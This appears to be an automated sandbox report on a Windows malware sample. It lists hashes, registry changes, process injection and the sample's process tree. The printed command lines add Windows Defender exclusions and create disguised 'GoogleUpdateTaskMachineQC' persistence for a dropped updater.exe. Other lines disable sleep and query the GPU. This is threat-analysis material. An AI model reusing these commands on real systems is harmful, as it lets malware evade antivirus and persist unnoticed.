Analysis
max time kernel: 54s
max time network: 183s
platform: windows10-1703_x64
resource: win10-20220812-en
resource tags: arch:x64, arch:x86, image:win10-20220812-en, locale:en-us, os:windows10-1703-x64, system
submitted: 16/09/2022, 22:26
Static task: static1
Behavioral task: behavioral1
  Sample: f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe
  Resource: win7-20220901-en
Behavioral task: behavioral2
  Sample: f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe
  Resource: win10-20220812-en
General
Target: f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe
Size: 2.0MB
MD5: 49feabd5f539ab1c2ecf22298ad7aa3c
SHA1: 28fead69d9d6c8b651b51925f20ebb592f99d488
SHA256: f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63
SHA512: 62a8e5d282ac7b080dd520c928800f3655b409c5231a11280744a16ff1a9f10d38723a25914051c1ea0cedd10780923ad60b50982e5775115497c8475dc3d901
SSDEEP: 49152:yKLFXgaUnuVC6jBmo2a7RY302cQHyD55:yotSuXBmo2a7Wi6yD5
Malware Config
Signatures
Executes dropped EXE 1 IoCs
pid | Process
2256 | updater.exe
Drops file in System32 directory 3 IoCs
description | ioc | Process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 2256 set thread context of 4540 | 2256 | updater.exe | 92
Drops file in Program Files directory 3 IoCs
description | ioc | Process
File created | C:\Program Files\Google\Chrome\updater.exe | f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid | Process
2768 | powershell.exe
2768 | powershell.exe
2768 | powershell.exe
4848 | powershell.exe
4848 | powershell.exe
4848 | powershell.exe
4796 | powershell.exe
4796 | powershell.exe
4796 | powershell.exe
3892 | powershell.exe
3892 | powershell.exe
3892 | powershell.exe
3300 | powershell.exe
3300 | powershell.exe
3300 | powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2768 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2768 | powershell.exe
Token: SeSecurityPrivilege | 2768 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2768 | powershell.exe
Token: SeLoadDriverPrivilege | 2768 | powershell.exe
Token: SeSystemProfilePrivilege | 2768 | powershell.exe
Token: SeSystemtimePrivilege | 2768 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2768 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2768 | powershell.exe
Token: SeCreatePagefilePrivilege | 2768 | powershell.exe
Token: SeBackupPrivilege | 2768 | powershell.exe
Token: SeRestorePrivilege | 2768 | powershell.exe
Token: SeShutdownPrivilege | 2768 | powershell.exe
Token: SeDebugPrivilege | 2768 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2768 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2768 | powershell.exe
Token: SeUndockPrivilege | 2768 | powershell.exe
Token: SeManageVolumePrivilege | 2768 | powershell.exe
Token: 33 | 2768 | powershell.exe
Token: 34 | 2768 | powershell.exe
Token: 35 | 2768 | powershell.exe
Token: 36 | 2768 | powershell.exe
Token: SeShutdownPrivilege | 4268 | powercfg.exe
Token: SeCreatePagefilePrivilege | 4268 | powercfg.exe
Token: SeShutdownPrivilege | 1992 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1992 | powercfg.exe
Token: SeDebugPrivilege | 4848 | powershell.exe
Token: SeShutdownPrivilege | 5064 | powercfg.exe
Token: SeCreatePagefilePrivilege | 5064 | powercfg.exe
Token: SeShutdownPrivilege | 4052 | powercfg.exe
Token: SeCreatePagefilePrivilege | 4052 | powercfg.exe
Token: SeIncreaseQuotaPrivilege | 4848 | powershell.exe
Token: SeSecurityPrivilege | 4848 | powershell.exe
Token: SeTakeOwnershipPrivilege | 4848 | powershell.exe
Token: SeLoadDriverPrivilege | 4848 | powershell.exe
Token: SeSystemProfilePrivilege | 4848 | powershell.exe
Token: SeSystemtimePrivilege | 4848 | powershell.exe
Token: SeProfSingleProcessPrivilege | 4848 | powershell.exe
Token: SeIncBasePriorityPrivilege | 4848 | powershell.exe
Token: SeCreatePagefilePrivilege | 4848 | powershell.exe
Token: SeBackupPrivilege | 4848 | powershell.exe
Token: SeRestorePrivilege | 4848 | powershell.exe
Token: SeShutdownPrivilege | 4848 | powershell.exe
Token: SeDebugPrivilege | 4848 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 4848 | powershell.exe
Token: SeRemoteShutdownPrivilege | 4848 | powershell.exe
Token: SeUndockPrivilege | 4848 | powershell.exe
Token: SeManageVolumePrivilege | 4848 | powershell.exe
Token: 33 | 4848 | powershell.exe
Token: 34 | 4848 | powershell.exe
Token: 35 | 4848 | powershell.exe
Token: 36 | 4848 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 4848 | powershell.exe
Token: SeSecurityPrivilege | 4848 | powershell.exe
Token: SeTakeOwnershipPrivilege | 4848 | powershell.exe
Token: SeLoadDriverPrivilege | 4848 | powershell.exe
Token: SeSystemProfilePrivilege | 4848 | powershell.exe
Token: SeSystemtimePrivilege | 4848 | powershell.exe
Token: SeProfSingleProcessPrivilege | 4848 | powershell.exe
Token: SeIncBasePriorityPrivilege | 4848 | powershell.exe
Token: SeCreatePagefilePrivilege | 4848 | powershell.exe
Token: SeBackupPrivilege | 4848 | powershell.exe
Token: SeRestorePrivilege | 4848 | powershell.exe
Token: SeShutdownPrivilege | 4848 | powershell.exe
Suspicious use of WriteProcessMemory 41 IoCs
description | pid | Process | procid_target
PID 2700 wrote to memory of 2768 | 2700 | f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe | 66
PID 2700 wrote to memory of 2768 | 2700 | f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe | 66
PID 2700 wrote to memory of 4840 | 2700 | f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe | 76
PID 2700 wrote to memory of 4840 | 2700 | f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe | 76
PID 2700 wrote to memory of 4848 | 2700 | f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe | 75
PID 2700 wrote to memory of 4848 | 2700 | f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe | 75
PID 4840 wrote to memory of 4268 | 4840 | cmd.exe | 72
PID 4840 wrote to memory of 4268 | 4840 | cmd.exe | 72
PID 4840 wrote to memory of 1992 | 4840 | cmd.exe | 71
PID 4840 wrote to memory of 1992 | 4840 | cmd.exe | 71
PID 4840 wrote to memory of 5064 | 4840 | cmd.exe | 69
PID 4840 wrote to memory of 5064 | 4840 | cmd.exe | 69
PID 4840 wrote to memory of 4052 | 4840 | cmd.exe | 70
PID 4840 wrote to memory of 4052 | 4840 | cmd.exe | 70
PID 2700 wrote to memory of 4796 | 2700 | f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe | 78
PID 2700 wrote to memory of 4796 | 2700 | f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe | 78
PID 4796 wrote to memory of 4784 | 4796 | powershell.exe | 81
PID 4796 wrote to memory of 4784 | 4796 | powershell.exe | 81
PID 2256 wrote to memory of 3892 | 2256 | updater.exe | 82
PID 2256 wrote to memory of 3892 | 2256 | updater.exe | 82
PID 2256 wrote to memory of 308 | 2256 | updater.exe | 84
PID 2256 wrote to memory of 308 | 2256 | updater.exe | 84
PID 2256 wrote to memory of 3300 | 2256 | updater.exe | 85
PID 2256 wrote to memory of 3300 | 2256 | updater.exe | 85
PID 308 wrote to memory of 2332 | 308 | cmd.exe | 88
PID 308 wrote to memory of 2332 | 308 | cmd.exe | 88
PID 308 wrote to memory of 772 | 308 | cmd.exe | 89
PID 308 wrote to memory of 772 | 308 | cmd.exe | 89
PID 308 wrote to memory of 2676 | 308 | cmd.exe | 90
PID 308 wrote to memory of 2676 | 308 | cmd.exe | 90
PID 308 wrote to memory of 2680 | 308 | cmd.exe | 91
PID 308 wrote to memory of 2680 | 308 | cmd.exe | 91
PID 2256 wrote to memory of 4540 | 2256 | updater.exe | 92
PID 2256 wrote to memory of 4540 | 2256 | updater.exe | 92
PID 2256 wrote to memory of 4540 | 2256 | updater.exe | 92
PID 2256 wrote to memory of 4292 | 2256 | updater.exe | 93
PID 2256 wrote to memory of 4292 | 2256 | updater.exe | 93
PID 4540 wrote to memory of 5072 | 4540 | conhost.exe | 94
PID 4540 wrote to memory of 5072 | 4540 | conhost.exe | 94
PID 5072 wrote to memory of 4632 | 5072 | cmd.exe | 97
PID 5072 wrote to memory of 4632 | 5072 | cmd.exe | 97
Processes
(child processes are indented under their parent; each entry lists image path, command line, PID and triggered signatures)

C:\Users\Admin\AppData\Local\Temp\f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\f7def905da904f587d4d599d336c829f38855021f77a3f824345dace0b98ac63.exe"
  PID: 2700
  Signatures: Drops file in Program Files directory; Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      PID: 2768
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell <#ubrrq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      PID: 4848
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      PID: 4840
      Signatures: Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell <#nutydrrnl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
      PID: 4796
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory

        C:\Windows\system32\schtasks.exe
          Command line: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          PID: 4784
C:\Windows\system32\powercfg.exe
  Command line: powercfg /x -standby-timeout-ac 0
  PID: 5064
  Signatures: Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\powercfg.exe
  Command line: powercfg /x -standby-timeout-dc 0
  PID: 4052
  Signatures: Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\powercfg.exe
  Command line: powercfg /x -hibernate-timeout-dc 0
  PID: 1992
  Signatures: Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\powercfg.exe
  Command line: powercfg /x -hibernate-timeout-ac 0
  PID: 4268
  Signatures: Suspicious use of AdjustPrivilegeToken
C:\Program Files\Google\Chrome\updater.exe
  Command line: "C:\Program Files\Google\Chrome\updater.exe"
  PID: 2256
  Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      PID: 3892
      Signatures: Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses

    C:\Windows\system32\cmd.exe
      Command line: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      PID: 308
      Signatures: Suspicious use of WriteProcessMemory

        C:\Windows\system32\powercfg.exe
          Command line: powercfg /x -hibernate-timeout-ac 0
          PID: 2332

        C:\Windows\system32\powercfg.exe
          Command line: powercfg /x -hibernate-timeout-dc 0
          PID: 772

        C:\Windows\system32\powercfg.exe
          Command line: powercfg /x -standby-timeout-ac 0
          PID: 2676

        C:\Windows\system32\powercfg.exe
          Command line: powercfg /x -standby-timeout-dc 0
          PID: 2680

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell <#ubrrq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      PID: 3300
      Signatures: Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses

    C:\Windows\system32\conhost.exe
      Command line: C:\Windows\system32\conhost.exe qwsdbbjaa
      PID: 4540
      Signatures: Suspicious use of WriteProcessMemory

        C:\Windows\system32\cmd.exe
          Command line: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          PID: 5072
          Signatures: Drops file in Program Files directory; Suspicious use of WriteProcessMemory

            C:\Windows\System32\Wbem\WMIC.exe
              Command line: wmic PATH Win32_VideoController GET Name, VideoProcessor
              PID: 4632
              Signatures: Modifies data under HKEY_USERS

    C:\Windows\system32\cmd.exe
      Command line: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      PID: 4292
      Signatures: Drops file in Program Files directory
Network
MITRE ATT&CK Matrix
Downloads

Filesize: 2.0MB
MD5: c269a7457307ed26981eb994f340bbb8
SHA1: 03770bb52018fad3f9a0e7475be6392911d65edf
SHA256: 7862f14bac237a6e728eb45d741056a614ac0d1e4bf307c6263b37d2f35b9ddc
SHA512: 0284fa7889fa4e5f587235a9bde51065442da38a4495c196501cde7cb908951cce783f23010b4603d76d64f672b2afb3b09c52ab1d8c2100514dc6728cd35421

Filesize: 2.0MB
MD5: c269a7457307ed26981eb994f340bbb8
SHA1: 03770bb52018fad3f9a0e7475be6392911d65edf
SHA256: 7862f14bac237a6e728eb45d741056a614ac0d1e4bf307c6263b37d2f35b9ddc
SHA512: 0284fa7889fa4e5f587235a9bde51065442da38a4495c196501cde7cb908951cce783f23010b4603d76d64f672b2afb3b09c52ab1d8c2100514dc6728cd35421

Filesize: 226B
MD5: fdba80d4081c28c65e32fff246dc46cb
SHA1: 74f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256: b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512: b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Filesize: 3KB
MD5: 8592ba100a78835a6b94d5949e13dfc1
SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Filesize: 1KB
MD5: 9fceaa8f38c649b2e22774fae18c3a57
SHA1: 5fd53df1613ba5450c0b8efd46825db0d9b524e3
SHA256: fd1439be9ac2c7e9657901542c04521cea486ac10ba40144cfd20183b18e51c5
SHA512: 45846475ef49c7fe0b7ccca1c18404f963f689c73ff4bd29add0fc49ce3872bceb230d5a45782731c4161888d853671253231c23e13b05b0739a4b835ff0c52a

Filesize: 1KB
MD5: 4d065ba56b0131fd0eeaa2ca6c1a5c30
SHA1: 61c43c376097962c3257c91475e159002d9a4d78
SHA256: fb3a24224b370355fb3bedf1a95ee761450b00d93aa7861cfc37c512dbe3bf04
SHA512: c7a095590bbd4a11b10aa9955dfe2207a06b9a7569e3492257f8657f373a05d98792cc735056868faa7df0bf9f3c662d3e33e608e4851813cbf247d15ceb8cd0

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 3KB
MD5: 811d351aabd7b708fef7683cf5e29e15
SHA1: 06fd89e5a575f45d411cf4b3a2d277e642e73dbb
SHA256: 0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18
SHA512: 702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: 302a7c179ef577c237c5418fb770fd27
SHA1: 343ef00d1357a8d2ff6e1143541a8a29435ed30c
SHA256: 9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f
SHA512: f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699